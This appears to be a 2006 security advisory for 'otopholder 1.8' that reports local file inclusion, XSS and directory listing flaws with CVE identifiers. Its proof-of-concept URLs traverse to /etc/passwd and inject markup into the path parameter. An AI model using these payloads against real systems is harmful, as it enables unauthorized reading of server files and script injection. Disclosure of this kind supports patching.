otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln

2006.08.23

Credit: Vampire

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2006-4260 | CVE-2006-4259

CWE: CWE-79

vendor:
http://www.jakeo.com

vuln :
http://[host]/foto/index.php?path=../../etc/passwd

http://[host]/foto/index.php?path=<b>xss</b>

http://[host]/foto/index.php?path=../../[directory listing]

Author : Vampire 

Vampire_chiristof<img src="/imgs/at.gif" border=0 align=middle>yahoo.com

Homepage : Www.HackerZ.iR

Www.H4ckerZ.Com

Iran HackerZ Security Team

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.